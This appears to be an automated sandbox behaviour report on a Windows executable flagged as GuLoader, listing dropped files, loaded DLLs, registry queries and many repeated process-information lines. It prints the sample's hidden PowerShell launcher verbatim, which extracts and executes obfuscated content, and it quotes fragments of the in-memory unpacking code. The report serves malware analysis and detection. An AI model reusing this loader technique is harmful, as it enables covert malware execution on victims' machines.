File created: C:\Users\user\AppData\Local\unshabbily

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03

Source: C:\Users\user\Desktop\beNxougDFV.exe

File created: C:\Users\user\AppData\Local\Temp\nsa5748.tmp

Jump to behavior

Source: beNxougDFV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\beNxougDFV.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: beNxougDFV.exe

ReversingLabs: Detection: 50%

Source: C:\Users\user\Desktop\beNxougDFV.exe

File read: C:\Users\user\Desktop\beNxougDFV.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\beNxougDFV.exe "C:\Users\user\Desktop\beNxougDFV.exe"
Source: C:\Users\user\Desktop\beNxougDFV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\beNxougDFV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\beNxougDFV.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: beNxougDFV.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ergotropic $Cornmuse18 $Autoophuggeren67), (Oligarchist204 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Offdayen = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Totalforbydes)), $Stumfilmsklassikere60).DefineDynamicModule($Torpedobaade158, $false).DefineType($Apotekerkde, $Uviol, [System.Multic

Suspicious powershell command line found

Source: C:\Users\user\Desktop\beNxougDFV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
Source: C:\Users\user\Desktop\beNxougDFV.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"			Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe	File created: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\beNxougDFV.exe	File created: C:\Users\user\AppData\Local\Temp\nsw599B.tmp\Banner.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\unshabbily\beNxougDFV.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\beNxougDFV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
